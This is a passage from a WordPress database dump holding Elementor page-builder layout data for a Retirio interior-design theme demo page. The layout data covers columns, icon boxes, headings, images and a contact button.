\\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4259,4926,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4260,4926,'_elementor_pro_version','3.8.1'),(4261,4927,'_wp_page_template','elementor_header_footer'),(4262,4927,'_elementor_edit_mode','builder'),(4263,4927,'_elementor_template_type','wp-page'),(4264,4927,'_elementor_version','3.8.1'),(4265,4927,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":